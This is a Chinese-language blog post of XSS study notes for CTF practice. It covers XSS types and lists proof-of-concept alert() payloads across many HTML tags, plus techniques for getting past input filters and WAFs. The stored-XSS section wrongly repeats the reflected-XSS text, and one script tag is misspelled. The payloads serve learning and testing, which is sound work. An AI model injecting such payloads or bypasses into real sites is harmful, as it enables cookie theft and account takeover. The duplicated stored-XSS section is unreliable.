XSS简记
XSS从0到1
本篇记学习XSS的历程. ——M.Y
参考文章:
XSS
定义:
xss,全称跨站脚本攻击(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。
这是一种将任意 Javascript 代码插入到其他Web用户页面中执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览该页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 cookie窃取等。
凡是数据输入或者交互的地方,都有可能发生xss。
XSS属于代码注入的一种,它允许攻击者将代码注入到网页,其他用户在浏览网页时就会受到影响。
XSS属于客户端攻击,受害者最终是用户,但是,网站的管理人员也是用户之一。这意味着XSS可以进行“服务端攻击”
漏洞出现的原因:
程序对输入和输出不够严格,导致“精心构造”的脚本输入后,在输出前端时被浏览器当作有效代码解析执行从而产生危害。
分类:
反射型:反射型XSS是最基本的XSS形式,也被称为非持久型XSS(Non-persistent XSS)。这种攻击的特点是恶意脚本不会永久存储在目标服务器上,而是通过URL参数、表单提交等途径”反射”回用户的浏览器中执行。
- 攻击者构造包含恶意脚本的特殊URL
- 通过钓鱼邮件、社交工程等方式诱使受害者点击该URL
- 服务器接收请求并将恶意脚本”反射”到响应页面中
- 受害者的浏览器解析并执行该脚本
在CTF中,反射型XSS题目通常表现为:
- 搜索框、联系表单等输入点直接将用户输入返回到页面
- URL参数值未经处理直接输出到HTML中
- 需要构造特殊URL并诱导管理员或bot访问以获取flag
例:http://www.test.com/search.php?key="><script>alert("xss")</script>
存储型:存储型XSS,又称持久型XSS(Persistent XSS),是更为危险的XSS形式。与反射型不同,存储型XSS的恶意脚本会被永久保存在目标服务器上(如数据库、留言板、评论区域等),每当用户访问包含该恶意内容的页面时,脚本就会被执行
典型攻击流程:
- 攻击者构造包含恶意脚本的特殊URL
- 通过钓鱼邮件、社交工程等方式诱使受害者点击该URL
- 服务器接收请求并将恶意脚本”反射”到响应页面中
- 受害者的浏览器解析并执行该脚本
在CTF中,反射型XSS题目通常表现为:
- 搜索框、联系表单等输入点直接将用户输入返回到页面
- URL参数值未经处理直接输出到HTML中
- 需要构造特殊URL并诱导管理员或bot访问以获取flag
DOM型:DOM型XSS是一种特殊的XSS形式,其特点是恶意代码完全在客户端执行,不涉及服务器端的响应处理。这种漏洞源于JavaScript对DOM(文档对象模型)的不安全操作,如使用document.write、innerHTML或eval等函数直接处理用户可控的数据。
典型攻击流程:
- 攻击者构造包含恶意脚本的特殊URL
- 受害者访问该URL
- 客户端JavaScript从URL或页面元素中提取数据并动态修改DOM
- 修改过程中未正确过滤导致恶意脚本执行
在CTF中,DOM型XSS题目通常表现为:
- 页面使用JavaScript从URL参数或片段(fragment)中读取数据并动态更新页面内容
- 使用
eval、setTimeout或Function构造函数等动态执行代码 - 需要分析前端JavaScript逻辑才能构造有效payload
例如以下前端代码:
1 | var target = location.hash.substring(1); |
攻击者可构造如下url:
http://vulnerable-site.com/#<script>alert('XSS')</script>
触发标签
无过滤:
在程序没有进行过滤的情况下,有以下触发标签:
<script>
1 | <scirpt>alert("xss");</script> |
<img>
1 | // 图片加载错误时触发 |
<a>
1 | <a href="https://www.qq.com">qq</a> |
<input>
1 | <input onfocus="alert('xss');"> |
<form>
1 | <form action=javascript:alert('xss') method="get"> |
<iframe>
1 | <iframe onload=alert("xss");></iframe> |
<svg>
1 | <svg onload=alert(1)> |
<body>
1 | <body onload="alert(1)"> |
<button>
1 | // 元素上点击鼠标时触发 |
<p>
1 | // 元素上按下鼠标时触发 |
<details>
1 | <details ontoggle="alert('xss');"> |
<select>
1 | <select onfocus=alert(1)></select> |
<video>
1 | <video><source onerror="alert(1)"> |
<audio>
1 | <audio src=x onerror=alert("xss");> |
<textarea>
1 | <textarea onfocus=alert("xss"); autofocus> |
<keygen>
1 | <keygen autofocus onfocus=alert(1)> // 仅限火狐 |
<marquee>
1 | <marquee onstart=alert("xss")></marquee> |
<isindex>
1 | <isindex type=image src=1 onerror=alert("xss")> // 仅限于IE |
利用link远程包含js文件
1 | // 在无CSP的情况下才可以 |
javascript伪协议
1 | // <a>标签 |
expression属性
1 | <img style="xss:expression(alert('xss''))"> |
background属性
1 | <table background=javascript:alert(1)></table> |
过滤绕过:
- 过滤空格
1 | // 用 / 代替空格 |
- 过滤关键字
1 | // 大小写绕过 |
- 其它字符混淆
1 | /*有的waf可能是用正则表达式去检测是否有xss攻击,如果我们能fuzz出正则的规则,则我们就可以使用其它字符去混淆我们注入的代码了 |
- 编码绕过
1 | //Unicode编码绕过 |
- 过滤双引号,单引号
1 | //如果是html标签中,我们可以不用引号;如果是在js中,我们可以用反引号代替单双引号 |
- 过滤括号
1 | //当括号被过滤的时候可以使用throw来绕过 |
- 过滤url地址
1 | //使用url编码 |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 M.Yのblog!
wechat
alipay
相关推荐
2025-04-14
CTF-Web-PHP-RCE
CTF-Web-PHP-RCE ~made by Mitunlny(M.Y)~ 参考文章: https://www.cnblogs.com/tomyyyyy/p/13905357.html https://blog.csdn.net/2302_76827504/article/details/130427099 https://developer.aliyun.com/article/1224913 https://blog.csdn.net/qq_45392044/article/details/145836455 https://www.cnblogs.com/chir/p/13420148.html PHP RCE 基础一、RCE漏洞概述什么是RCE——基本概念远程代码/命令执行漏洞(Remote Code/Command...
2025-04-12
CTF-WEB-SQL注入
CTF-WEB-SQL注入第一部分:SQL注入基础1.1 SQL注入概述SQL 注入是指 Web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 Web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 1.1.1 SQL注入的危害SQL注入可以导致以下严重后果: 绕过认证机制,非法登录系统 窃取、篡改、删除数据库中的敏感数据 执行系统命令,控制服务器 读取服务器上的任意文件 向服务器上传恶意文件 完全控制数据库服务器 1.1.2 SQL注入原理SQL注入的根本原因是程序没有对用户输入进行严格的过滤,导致用户输入被拼接到SQL语句中执行。例如: 123$username = $_POST['username'];$password = $_POST['password'];$sql = "SELECT * FROM users WHERE...
2025-04-18
JavaScript基础语法
JavaScript 基础语法基础部分1. JavaScript 简介JavaScript(简称 JS)是一种轻量级、解释型、基于原型的脚本语言,主要用于网页开发,但也可用于服务器端(Node.js)和移动端(React Native)。 特点: 跨平台(浏览器、服务器、桌面应用)。 动态类型(变量类型在运行时确定)。 单线程但支持异步(通过事件循环机制)。 基于原型继承(而非传统的类继承)。 2. 变量与数据类型(1) 变量声明 var(旧标准,存在变量提升) 1var name = "John"; let(ES6+,块级作用域) 1let age = 25; const(ES6+,不可重新赋值) 1const PI = 3.14; (2) 数据类型JavaScript 有 7 种基本数据类型 和 1 种引用类型: 基本类型(Primitive Types): number(数字):42, 3.14, NaN(非数字) string(字符串):"hello",...
2025-02-28
HTML基础语法
HTML 基础语法【在科学上方是没有平坦的大路可走的,只有那在崎岖小路的攀登上不畏劳苦的人,才有期望到达光辉的顶点。 ——马克思】 前置生成浏览器文件.html的快捷方式:!+Enter 代码格式化: Shift+Alt+F HTML5 介绍:HTML5是用来描述网页的一种语言,称为超文本标记语言,用HTML5编写的文件,后缀为.html,HTML是一种标记语言,标记语言是一套标记标签,标签是由尖括号包围的关键字,例如:<html> 标签有两种表现形式: 双标签,例如<html><html> 单标签,例如<img> HTML5 基本骨架: DOCTYPE 声明:DOCTYPE是document type(文档类型)的缩写。<!DOCTYPE html>是H5的声明位于文档的最前面,处于标签之前。他是网页必备的组成部分,避免浏览器的怪异模式。 html标签:定义HTML文档,其他元素要包裹在它里面,标签定义了文档的开始点和结束点 123<!DOCTYPE...
2025-02-28
PHP基础语法
PHP基础语法PHPPHP即“超文本预处理器”,是一种通用开源脚本语言。PHP是在服务器端执行的脚本语言,与C语言类似,是常用的网站开发语言。主要适用于Web开发领域。 PHP是一门弱类型语言:不必向PHP声明该变量的数据类型,PHP会根据变量的值,自动把变量转为正确的数据类型 基础语法: PHP脚本可以放在文档中的任何位置。PHP脚本以<?PHP开始,以?>结束。 PHP文件的默认文件扩展名为.php PHP文件通常包含HTML标签和一些PHP代码 输出hello world: 1234<?php echo "hello,world" print "hello,world"?> 注释: 单行注释:// 多行注释:/**/ 变量: 变量以“$”符号开始,后面跟着变量的名称,变量名必须以字母或者下划线开始,变量名只能包含字母,数字,下划线。 变量名是区分大小写的! 123456<?php $x=5; $y=6; $z=$x+$y; echo...
2025-04-14
RCE视频
RCE-视频 ~made by Mitunlny(M.Y)~ 参考文章: https://www.cnblogs.com/tomyyyyy/p/13905357.html https://blog.csdn.net/2302_76827504/article/details/130427099 https://developer.aliyun.com/article/1224913 https://blog.csdn.net/qq_45392044/article/details/145836455 https://www.cnblogs.com/chir/p/13420148.html